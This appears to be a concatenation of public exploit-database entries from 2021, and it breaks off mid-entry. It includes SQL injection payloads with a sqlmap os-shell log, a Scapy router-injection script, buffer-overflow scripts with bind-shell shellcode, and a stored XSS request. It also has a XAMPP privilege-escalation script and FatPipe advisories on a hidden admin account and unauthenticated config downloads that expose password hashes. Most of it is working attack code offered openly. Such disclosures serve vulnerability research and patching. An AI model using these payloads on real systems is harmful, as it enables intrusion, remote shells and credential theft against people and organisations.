GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
Upgrade-Insecure-Requests: 1
# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow
# Author: John Page (aka hyp3rlinx)
# Date: 15/09/2021
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.
[Vulnerability Type]
Stack Buffer Overflow
[CVE Reference]
N/A
[Security Issue]
Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition.
E.g. cmd.exe /c <PAYLOAD>.
[Memory Dump]
(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3 ret
0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc int 3
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
Failed calling InternetOpenUrl, GLE=12029
FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000008
PROCESS_NAME: cmd.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_PARAMETER1: 0000000000000008
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000000000012d4
BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE
PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE
DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE
LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4
STACK_TEXT:
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
FOLLOWUP_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
SYMBOL_STACK_INDEX: 8
SYMBOL_NAME: cmd!StripQuotes+a8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: cmd
IMAGE_NAME: cmd.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 0
STACK_COMMAND: ~0s ; kb
FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
[Exploit/POC]
PAYLOAD=chr(235) + "\\CC"
PAYLOAD = PAYLOAD * 3000
with open("hate.cmd", "w") as f:
f.write(PAYLOAD)
[Network Access]
Local
[Video PoC URL]
https://www.youtube.com/watch?v=wYYgjV-PzD8
[Severity]
Low
[Disclosure Timeline]
Vendor Notification: Requires running dangerous file types already.
September 15, 2021 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure
# Google Dork: intext:"Powered by SmarterTrack"
# Date: 23/01/2020
# Exploit Author: Andrei Manole
# Vendor Homepage: https://www.smartertools.com/
# Software Link: https://www.smartertools.com/smartertrack
# Version: TESTED ON 10.x -> 14.x and to Build 7922 (set 9, 2021)
# Tested on: Windows 10
POC:
VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx
This file disclosure all agents id and first name and second name
# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated)
# Google Dork: intitle: "Library System by YahooBaba"
# Date: 26/08/2021
# Exploit Author: Vinay Bhuria
# Vendor Homepage: https://www.yahoobaba.net
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: v1.0
# Tested on: Windows
Description:
The Library System 1.0 application from Yahoobaba is vulnerable to
SQL injection via the 'student_id' parameter on the student.php page.
==================== 1. SQLi ====================
http://localhost:8081/library-system/student.php
The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated
user has the full ability to run system commands via --os-shell and fully compromise the system
POST parameter 'student_id' is vulnerable.
step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool.
step 2 : Now copy the post request and save it as test.txt file.
step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell"
----------------------------------------------------------------------
Parameter: student_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: student_id=14 AND 9655=9655
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- -
[14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php
[14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'desktop-Vinay\vinay'
# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers
# Date: 24/09/2021
# Exploit Author: Michael Alamoot
# Vendor Homepage: https://www.cisco.com/
# Version: RV130W 1.0.3.44
# Tested on: Kali linux
#! /usr/bin/env python3
from scapy.contrib.eigrp import EIGRPAuthData
from scapy.contrib.eigrp import EIGRPIntRoute
from scapy.contrib.eigrp import EIGRPGeneric
from scapy.contrib.eigrp import EIGRPSeq
from scapy.contrib.eigrp import EIGRP
from scapy.layers.vrrp import VRRPv3
from scapy.layers.vrrp import VRRP
from scapy.layers.l2 import Ether
from scapy.layers.inet import IP
from scapy.sendrecv import sendp
from scapy.volatile import RandMAC
from scapy.all import conf
import socket,networkx,os
import argparse,sys,asyncio
class argX:
def __init__(self):
self.parser = argparse.ArgumentParser(description="...")
self.parser.add_argument(
"-i","--ip",
help="ip router fake injection",
dest="ip",
)
self.parser.add_argument(
"-r","--ip-router",
help="ip router root",
dest="router",
default=conf.route.route('0.0.0.0')[2]
)
def argvX(self):
""" [0] ip-router [1] ip-fake """
args = self.parser.parse_args()
ip = args.ip
route = args.router
return [ip,route]
class exploit(object):
def __new__(cls,*args,**kwargs):
return super(exploit,cls).__new__(cls)
def __init__(self,IProuter,InjectFackeRouter):
self.IProuter = IProuter
self.InjectFackeRouter = InjectFackeRouter
self.MAC = RandMAC()
def pyload(self):
pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\
/VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\
/IP(src=self.IProuter,dst="224.0.0.10") \
/EIGRP(opcode="Update",asn=100,seq=0,ack=0
,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)])
return pyload
def start(self,count=[0,100]):
for i in range(count[0],count[1]):
sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0)
print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m")
if __name__ == "__main__":
a = argX().argvX()
if a[0]:
net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0])
net1.start()
else:
print("[-h] [--help]")
# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
# Date: 2021-09-26
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cyberfox.8pecxstudios.com
# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows
#[ About - Cyberfox ] :
#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture
#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.
# [ Exploit/POC ] :
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Cyberfox Web Browser
# 3.Copy the content of the file "output.txt" & Paste into the "search bar"
# 4.Crashed
Overflow = "\x41" * 9000000
try:
f=open("output.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(Overflow))
f.write(Overflow)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")
# Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)
# Date: 24.09.2021
# Software Link: https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2
# Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe
# Exploit Author: Achilles
# Tested Version: 1.3.8
# Tested on: Windows 7 64bit
# 1.- Run python code : Ether_MP3_CD_Burner.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open Ether_MP3_CD_Burner and press Register
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 1008
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x10037859) #SkinMagic.dll
nops = "\x90" * 20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 =
-e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")
payload = buffer + nseh + seh + nops + shellcode
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2021-07-31
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip
# Version: 2.2.4
# Tested on: Windows
# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities
# because it fails to properly sanitize user-supplied input.
# PoC - Stored XSS - Parameter: name
# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page
# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype)
# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)>
# 4) Click Confirm
# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar )
# Post Request (Step 4):
POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1
Host: domain.com
Content-Length: 205
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/json
Origin: http://domain.com
Referer: http://domain.com/wordpress/booking-page/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Original Author: Maximilian Barz (@S1lkys)
# Date: 27/09/2021
# Vendor Homepage: https://www.apachefriends.org
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
# Tested on: Windows 10 + XAMPP 7.3.10
# References: https://github.com/S1lkys/CVE-2020-11107
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
# Insert your payload path here
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application has a hidden administrative account 'cmuser' that has
no password and has write access permissions to the device. The user cmuser
is not visible in Users menu list of the application.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5684
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
30.05.2016
25.07.2021
--
Overview:
FatPipe Central Manager is a secure web based solution providing a centralized solution
to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
click of a button.
Central Manager = cmuser.
Once authenticated, you get admin rights.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 118
Date: Fri, 06 Aug 2017 16:37:07 GMT
Connection: close
{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the backup archive file using an HTTP
GET request. The only unknown part of the filename is the hostname of the system.
This will enable the attacker to disclose sensitive information and help her
in authentication bypass, privilege escalation and full system access.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5683
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php
30.05.2016
25.07.2021
--
Products:
---------
WARP / MPVPN / IPVPN
Format:
-------
https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz
Examples:
---------
curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP
curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN
Version:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2"
103: <h5>10.2.2r38</h5>
Product:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe"
15: <title>FatPipe MPVPN | Log in</title>
Content:
--------
$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz
$ cd etc
$ cat Xpasswd
Administrator:26df420bcb78bb02eef532d51aea22e2:1
fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1
$ ls
.
..
auto_config.conf
bird.conf
bridge.conf
cm.conf
crontab
dhcpd.conf
dnssec.conf
dynamic_route.conf
fatpipe
fileserver.conf
fp_arp.conf
fp_config.dtd
fp_distributed_global_rule
fp_global_rule
fp_version
haproxy
hosts
interface_access_list.conf
ipsec.conf
ipsec.d
ipsec.secrets
ipsec_cert_secrets
ipsec_shared_secrets
ipsec_subnet.conf
ipsec_xauth.conf
ipv4_dynamic_routing.conf
logrotate.d
manifest
named.conf
network_object.conf
ntp.conf
ppp
radiusclient
resolv.conf
rsyslog.conf
site.xml
site.xml.org
snmp_config.conf
squid
sysconfig
syslog.conf
tcp-congestion-table.conf
tcp-congestion-table.conf.org
webfilter.conf
xgreet.txt
xnetmap.conf
Xpasswd
xsnmp.conf
xtreme_conf.xml
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
<!--
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
